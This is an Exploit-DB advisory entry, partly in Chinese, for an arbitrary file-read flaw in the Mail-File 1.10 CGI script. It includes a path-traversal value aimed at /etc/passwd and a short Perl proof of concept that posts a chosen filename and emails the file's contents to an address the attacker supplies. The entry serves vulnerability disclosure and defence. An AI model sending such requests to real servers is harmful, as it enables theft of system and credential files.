https://www.exploit-db.com/exploits/20303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-188

MailFile1.10版本中的mailfile.cgiCGI程序存在漏洞。远程攻击者可以通过规定POST请求中的”filename”参数中的目标文件名读取任意文件，然后该漏洞被电子邮件发送到”email”参数指定地址。

source: http://www.securityfocus.com/bid/1807/info

OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of <i>any</i> readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);

--snip--

value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.

来源:BID
名称:1807
链接:http://www.securityfocus.com/bid/1807
来源:BUGTRAQ
名称:20001011MailFilePOSTVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0172.html
来源:XF
名称:mailfile-post-file-read
链接:http://xforce.iss.net/static/5358.php